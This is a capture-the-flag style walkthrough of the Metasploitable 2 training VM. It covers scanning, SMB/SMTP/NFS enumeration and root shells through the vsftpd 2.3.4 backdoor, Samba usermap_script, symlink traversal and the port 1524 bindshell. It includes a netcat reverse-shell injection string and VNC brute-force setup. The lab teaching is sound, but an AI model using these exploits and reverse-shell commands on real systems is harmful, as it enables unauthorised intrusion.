Metasploitable 2
Metasploitable 2 is a purposely vulnerable virtual machine that is designed for security testing, training, and educational purposes. Here, we have complete walkthrough of the machine.
Scanning
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -sC -O -p- 192.168.204.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 04:57 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00067s latency).
Not shown: 65505 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.204.137
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_DES_64_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
|_ssl-date: 2024-04-27T09:00:29+00:00; +7s from scanner time.
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 48158/udp mountd
| 100005 1,2,3 53046/tcp mountd
| 100021 1,3,4 39352/udp nlockmgr
| 100021 1,3,4 52660/tcp nlockmgr
| 100024 1 36532/tcp status
|_ 100024 1 37990/udp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 9
| Capabilities flags: 43564
| Some Capabilities: Speaks41ProtocolNew, SupportsTransactions, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, Support41Auth, SupportsCompression
| Status: Autocommit
|_ Salt: ddGt6L^rC8/!VoJfBTbp
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2024-04-27T09:00:29+00:00; +8s from scanner time.
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| uptime: 0 days, 2:37:34
| source ident: nmap
| source host: 97C828B9.D560E8F8.FFFA6D49.IP
|_ error: Closing Link: pydyrtxam[192.168.204.137] (Quit: pydyrtxam)
6697/tcp open irc UnrealIRCd (Admin email [email protected])
| irc-info:
| users: 2
| servers: 1
| lusers: 2
| lservers: 0
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| uptime: 0 days, 2:37:34
| source ident: nmap
| source host: 97C828B9.D560E8F8.FFFA6D49.IP
|_ error: Closing Link: aglkdhksl[192.168.204.137] (Quit: aglkdhksl)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/5.5
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
36532/tcp open status 1 (RPC #100024)
43137/tcp open java-rmi GNU Classpath grmiregistry
52660/tcp open nlockmgr 1-4 (RPC #100021)
53046/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:0C:29:71:62:0D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: metasploitable
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: metasploitable.localdomain
|_ System time: 2024-04-27T05:00:17-04:00
|_clock-skew: mean: 1h00m07s, deviation: 2h00m00s, median: 7s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.23 seconds
// Some codeEnumeration
Netbios Enumeration
We can provide the range to nbstat command on Kali and enumerate complete subnet.
└─$ nbtscan -r 192.168.204.135/24
Doing NBT name scan for addresses from 192.168.204.135/24
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.204.1 DESKTOP-GF76LUG <server> <unknown> 00:50:56:c0:00:08
192.168.204.135 <unknown> <unknown>
192.168.204.136 METASPLOITABLE <server> METASPLOITABLE 00:00:00:00:00:00
192.168.204.255 Sendto failed: Permission deniedWe can see the machine name. Simlarly, we can run an nmap scan with nbstat script.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV 192.168.204.136 --script nbstat.nse
Host script results:
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
| METASPLOITABLE<00> Flags: <unique><active>
| METASPLOITABLE<03> Flags: <unique><active>
| METASPLOITABLE<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WORKGROUP<1e> Flags: <group><active>Windows also have inbuilt tools to enumerate Netbios. Similarly we can check for current cache result of Netbios.
C:\Users\Hp>nbtstat -cSMB Enumeration
Nmap Provides a number of scripts for SMB Enumeration.
For example we can use script for OS Discovery through smb.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 139,445 -script smb-os-discovery 192.168.204.136
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-21 09:58 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00031s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:71:62:0D (VMware)
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: metasploitable
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: metasploitable.localdomain
|_ System time: 2024-03-21T09:58:59-04:00
Nmap done: 1 IP address (1 host up) scanned in 0.63 secondsSimilalry we can list shares with smbclient
┌──(kali㉿kali)-[~]
└─$ smbclient -L //192.168.204.136
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP METASPLOITABLESimilarly, we can check if we have read/write access on shares with smbmap.
┌──(kali㉿kali)-[~]
└─$ smbmap -H 192.168.204.136
[+] IP: 192.168.204.136:445 Name: 192.168.204.136
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (metasploitable server (Samba 3.0.20-Debian) We can see that we have write access on tmp directory which can be useful in exploitation phase.
We can run an automated script enum4linux to extract usernames as well.
SMTP Enumeration
We can also gather information about a host or network from vulnerable mail servers. The Simple Mail Transport Protocol (SMTP) supports several interesting commands, such as VRFY and EXPN A VRFY request asks the server to verify an email address, while EXPN asks the server for the membership of a mailing list. These can often be abused to verify existing users on a mail server, which is useful information during a penetration test.
We can use the VRFY commands to verify if users on SMTP servers exits.
┌──(kali㉿kali)-[~]
└─$ nc -nv 192.168.204.136 25
(UNKNOWN) [192.168.204.136] 25 (smtp) open
220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
VRFY root
252 2.0.0 root
VRFY admin
550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table
VRFY msfadmin
252 2.0.0 msfadminWe can use a meterpreter module to enumerate SMTP users.
msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 auxiliary(scanner/smtp/smtp_enum) > run
[*] 192.168.204.136:25 - 192.168.204.136:25 Banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
[+] 192.168.204.136:25 - 192.168.204.136:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, mysql, news, nobody, postfix, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data
[*] 192.168.204.136:25 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedWe can use smtp-user-enum to verify list of users if they exists or not.
──(kali㉿kali)-[~]
└─$ smtp-user-enum -M VRFY -U ~/Downloads/msfusers -t 192.168.204.136
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /home/kali/Downloads/msfusers
Target count ............. 1
Username count ........... 15
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Thu Mar 21 10:29:02 2024 #########
192.168.204.136: root exists
192.168.204.136: games exists
192.168.204.136: bin exists
192.168.204.136: nobody exists
192.168.204.136: sshd exists
192.168.204.136: dhcp exists
192.168.204.136: daemon exists
192.168.204.136: gnats exists
192.168.204.136: msfadmin exists
192.168.204.136: tomcat55 exists
######## Scan completed at Thu Mar 21 10:29:04 2024 #########
10 results.NFS Enumeration
We can try to list down shares available with showmount.
┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.204.136
Export list for 192.168.204.136:
/ *We can see that root folder is shared and we can mount it and exploit it.
Port 21 FTP Exploitation Metasploitable2
Scanning
Port 21 is open on Metasploitable2 and is running vsftpd 2.3.4 which has an inbuilt backdoor.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners -p 21 192.168.204.136
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-17 07:59 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00039s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| vulners:
| cpe:/a:vsftpd:vsftpd:2.3.4:
| PRION:CVE-2011-2523 10.0 https://vulners.com/prion/PRION:CVE-2011-2523
| EDB-ID:49757 10.0 https://vulners.com/exploitdb/EDB-ID:49757 *EXPLOIT*
|_ 1337DAY-ID-36095 10.0 https://vulners.com/zdt/1337DAY-ID-36095 *EXPLOIT*
MAC Address: 00:0C:29:71:62:0D (VMware)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.66 secondsManual Exploitation vsftpd 2.3.4
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.204.136
Connected to 192.168.204.136.
220 (vsFTPd 2.3.4)
Name (192.168.204.136:kali): a:)
331 Please specify the password.
Password:
421 Service not available, remote server has closed connection.
ftp: Login failed
ftp> exitThe trick is to add" :) " at the end of username. It opens a backdoor on port 6200. Which you can now connect.
┌──(kali㉿kali)-[~]
└─$ nc -nv 192.168.204.136 6200
(UNKNOWN) [192.168.204.136] 6200 (?) open
id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/LinuxManual Exploitation vsftpd 2.3.4 Method 2
We can use exploits from exploit-db. Search for exploit using searchsploit
┌──(kali㉿kali)-[~]
└─$ searchsploit vsftpd 2.3.4
--------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
--------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No ResultsNow copy the exploit
┌──(kali㉿kali)-[~]
└─$ searchsploit -m 49757
Exploit: vsftpd 2.3.4 - Backdoor Command Execution
URL: https://www.exploit-db.com/exploits/49757
Path: /usr/share/exploitdb/exploits/unix/remote/49757.py
Codes: CVE-2011-2523
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/49757.pyNow run it against the target. We will get the shell
┌──(kali㉿kali)-[~]
└─$ python2 49757.py 192.168.204.136
Success, shell opened
Send `exit` to quit shell
ls
bin
boot
cdrom
dev
FTP exploitation - Metasploit
Search for Vsftd in metasploit
msf6 auxiliary(scanner/vnc/vnc_login) > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoorNow use it, select the target and run it. We will get the shell.
msf6 auxiliary(scanner/vnc/vnc_login) > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wi
ki/Using-Metasploit
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.204.136
RHOST => 192.168.204.136
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.204.136:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.204.136:21 - USER: 331 Please specify the password.
[+] 192.168.204.136:21 - Backdoor service has been spawned, handling...
[+] 192.168.204.136:21 - UID: uid=0(root) gid=0(root)
is[*] Found shell.
d
id
id
[*] Command shell session 1 opened (192.168.204.135:43497 -> 192.168.204.136:6200) at 2024-03-18 10:27:28 -0400
uid=0(root) gid=0(root)
uid=0(root) gid=0(root)
uid=0(root) gid=0(root)Port 445 SMB Exploitation Metasploitable2
Scanning with vuln and vulners SMB port
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners -p 139,445 192.168.204.136
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-17 08:57 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00044s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:71:62:0D (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.64 seconds──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vuln -p 139,445 192.168.204.136
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-17 08:58 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00034s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:71:62:0D (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.50 secondsAs we did not get exact version of smb service, we can try metasploit auxillary module to check smb version.
msf6 > search smb version
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution
1 exploit/linux/misc/cisco_rv340_sslvpn 2022-02-02 good Yes Cisco RV340 SSL VPN Unauthenticated Remote Code Execution
2 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
3 exploit/windows/browser/ms10_022_ie_vbscript_winhlp32 2010-02-26 great No MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution
4 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
5 auxiliary/dos/windows/smb/rras_vls_null_deref 2006-06-14 normal No Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference
6 auxiliary/dos/windows/smb/ms11_019_electbowser normal No Microsoft Windows Browser Pool DoS
7 exploit/windows/smb/smb_rras_erraticgopher 2017-06-13 average Yes Microsoft Windows RRAS Service MIBEntryGet Overflow
8 auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow normal No Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
9 auxiliary/scanner/smb/smb_version normal No SMB Version Detection
We can see that we have scanner at number 9.
msf6 > use 9
msf6 auxiliary(scanner/smb/smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/met
asploit-framework/wiki/Using-Metasploit
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.204.136:445 - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 192.168.204.136:445 - Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.204.136: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Running it we get the samba version (Samba 3.0.20-Debian).
Now let us see what we get at searchsploit.
archsploit Samba 3.0.20
------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploi | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No ResultsSo, we have a metasploit module to exploit the vulnerability.
Samba exploitation Metasploitable 2 with Metasploit
msf6 auxiliary(scanner/smb/smb_version) > search samba user map
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script
msf6 auxiliary(scanner/smb/smb_version) > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/meta
sploit-framework/wiki/Using-Metasploit
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.204.135 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 192.168.204.135:4444
ls
[*] Command shell session 1 opened (192.168.204.135:4444 -> 192.168.204.136:57884) at 2024-03-17 09:01:33 -0400
bin
boot
cdrom Manual SMB (Samba Exploitation) on Metasploitable 2 without metasploit
Use smbclient to connect to shares. We can see that we can connect anonymously.
┌──(kali㉿kali)-[~]
└─$ smbclient -L \\192.168.204.136
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successfulHere we have tmp share. If it writable we can leverage it to get a shell.
Now connect with it and check the available commands with help command.
┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.204.136/tmp
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff .. Now open a listener on the attacking machine.
nc -lnvp 4444 Now use the following command
logon "/=`nc 192.168.204.135 4444 -e /bin/bash`"And we get the shell
SMB writable share - Wide links
Samba, when configured with a writeable file share and "wide links" enabled (default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared. The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share.
┌──(kali㉿kali)-[~]
└─$ smbmap -H 192.168.204.136
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - [email protected]
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 192.168.204.136:445 Name: 192.168.204.136 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (metasploitable server (Samba 3.0.20-Debian))Now, we can use a meatasploit module to exploit it.
┌──(kali㉿kali)-[~]
└─$ msfconsole
msf6 > use auxiliary/admin/smb/samba_symlink_traversal
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
SMBSHARE => tmp
msf6 auxiliary(admin/smb/samba_symlink_traversal) > run
[*] Running module against 192.168.204.136
[*] 192.168.204.136:445 - Connecting to the server...
[*] 192.168.204.136:445 - Trying to mount writeable share 'tmp'...
[*] 192.168.204.136:445 - Trying to link 'rootfs' to the root filesystem...
[*] 192.168.204.136:445 - Now access the following share to browse the root filesystem:
[*] 192.168.204.136:445 - \\192.168.204.136\tmp\rootfs\
[*] Auxiliary module execution completed
msf6 auxiliary(admin/smb/samba_symlink_traversal) > Now, we have a share rootfs where we can access the complete file system.
┌──(kali㉿kali)-[~]
└─$ smbclient \\\\192.168.204.136\\tmp
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> cd rootfs
smb: \rootfs\> cd etc
smb: \rootfs\etc\> more passwdPort 1524 Remote Shell Metasploitable2
We saw an open port 1524 on the machine. We can try to fingerprint it with version scan for the running service.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vuln -p 1524 192.168.204.136
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-21 23:32 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
1524/tcp open bindshell Metasploitable root shell
MAC Address: 00:0C:29:71:62:0D (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.90 secondsWe can see that we have a bind shell on the port. We can try connecting to it.
┌──(kali㉿kali)-[~]
└─$ nc -nv 192.168.204.136 1524
(UNKNOWN) [192.168.204.136] 1524 (ingreslock) open
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:/# whoami
root
root@metasploitable:/# And we are successfully able to connect to our backdoor.
Port 5900 VNC Exploitation Metasploitable2
First scan for the service
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -p 5900 --script vuln 192.168.204.136
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-18 10:06 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
5900/tcp open vnc VNC (protocol 3.3)
MAC Address: 00:0C:29:71:62:0D (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.61 secondsThe port is open. However, we have not found any vulnerabilities. We will try to brute force it with metasploit.
Bruteforcing VNC Metasploit
search for VNC auxillary modules
msf6 > search vnc
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/vnc/ard_root_pw normal No Apple Remote Desktop Root Vulnerability
1 auxiliary/server/capture/vnc normal No Authentication Capture: VNC
47 exploit/windows/vnc/ultravnc_viewer_bof 2008-02-06 normal No UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
48 auxiliary/scanner/vnc/vnc_none_auth normal No VNC Authentication None Detection
49 auxiliary/scanner/vnc/vnc_login normal No VNC Authentication ScannerWe have the vnc_login module. Select the module and see options.
msf6 > use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > show options
Module options (auxiliary/scanner/vnc/vnc_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accep
ted: none, user, user&realm)
PASSWORD no The password to test
PASS_FILE /usr/share/metasploit-framework/dat no File containing passwords, one per line
a/wordlists/vnc_passwords.txt
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-fr
amework/wiki/Using-Metasploit
RPORT 5900 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per
USERNAME <BLANK> no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated
r per line
USER_AS_PASS false no Try the username as the password for all user
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
